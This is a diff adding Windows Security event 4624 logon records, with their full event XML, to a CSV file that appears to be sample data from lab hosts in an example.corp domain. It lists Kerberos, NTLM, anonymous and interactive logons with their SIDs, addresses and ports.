+    <Data Name=""TargetUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x18423d</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">fe80::79bf:8ee2:433c:2567</Data>
+    <Data Name=""IpPort"">56034</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+  </EventData>
+</Event>"
+2019-03-19T04:02:21.929554+04:00,1552953741.929554,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,::1,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:21.460919Z"">
+    </TimeCreated>
+    <EventRecordID>566889</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""696"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x184212</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">56033</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-03-19T04:02:04.319945+04:00,1552953724.319945,4624,Administrator,EXAMPLE,3,NtLmSsp,-,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.257778Z"">
+    </TimeCreated>
+    <EventRecordID>566835</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""2836"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x17e2d2</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-03-19T04:02:04.241919+04:00,1552953724.241919,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.226251Z"">
+    </TimeCreated>
+    <EventRecordID>566830</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""2836"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x17e2c0</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49237</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-03-19T04:02:04.226251+04:00,1552953724.226251,4624,Administrator,EXAMPLE,3,NtLmSsp,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.210688Z"">
+    </TimeCreated>
+    <EventRecordID>566826</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""2836"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x17e2aa</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49236</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-03-19T04:02:04.210688+04:00,1552953724.210688,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,NULL,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.179623Z"">
+    </TimeCreated>
+    <EventRecordID>566823</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""2836"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x17e29a</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">NULL</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49236</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:31:31.556812Z"">
+    </TimeCreated>
+    <EventRecordID>5323</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""3952"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x7d4f4</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">PC01</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49169</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:31:46.648513+04:00,1550071906.648513,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,10.0.2.17,PC01,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:31:19.529518Z"">
+    </TimeCreated>
+    <EventRecordID>5322</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""3952"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x73d02</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">PC01</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49168</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:29:41.418441+04:00,1550071781.418441,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:29:40.657347Z"">
+    </TimeCreated>
+    <EventRecordID>5319</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""3952"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">PC02</Data>
+    <Data Name=""TargetLogonId"">0x4a26d</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">User32 </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">PC02</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x994</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\winlogon.exe</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">0</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:27:53.653483+04:00,1550071673.653483,4624,IEUser,PC02,10,User32,127.0.0.1,PC02,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:26:53.356780Z"">
+    </TimeCreated>
+    <EventRecordID>5315</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""3952"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">PC02</Data>
+    <Data Name=""TargetLogonId"">0x45120</Data>
+    <Data Name=""LogonType"">10</Data>
+    <Data Name=""LogonProcessName"">User32 </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">PC02</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x658</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\winlogon.exe</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">49164</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:25:17.799376+04:00,1550071517.799376,4624,IEUser,PC02,2,User32,127.0.0.1,PC02,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:19:51.259835Z"">
+    </TimeCreated>
+    <EventRecordID>5308</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""528"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">PC02</Data>
+    <Data Name=""TargetLogonId"">0x21f73</Data>
+    <Data Name=""LogonType"">2</Data>
+    <Data Name=""LogonProcessName"">User32 </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">PC02</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x198</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\winlogon.exe</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">0</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:19:51.259835+04:00,1550071191.259835,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:17:38.779337Z"">
+    </TimeCreated>
+    <EventRecordID>5305</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""528"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:17:38.779337+04:00,1550071058.779337,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:17:38.018243Z"">
+    </TimeCreated>
+    <EventRecordID>5303</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""528"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC02$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">SYSTEM</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""LogonType"">5</Data>
+    <Data Name=""LogonProcessName"">Advapi  </Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:17:38.018243+04:00,1550071058.018243,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,-,,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:36.367608Z"">
+    </TimeCreated>
+    <EventRecordID>5302</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""876"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-7</Data>
+    <Data Name=""TargetUserName"">ANONYMOUS LOGON</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x113f5</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V1</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">-</Data>
+    <Data Name=""IpPort"">-</Data>
+  </EventData>
+</Event>"
+2019-02-13T19:15:08.821952+04:00,1550070908.821952,4624,sshd_server,PC02,5,Advapi,-,PC02,PC02.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T15:15:08.689762Z"">
+    </TimeCreated>
+    <EventRecordID>5299</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""480"" ThreadID=""516"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC02.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
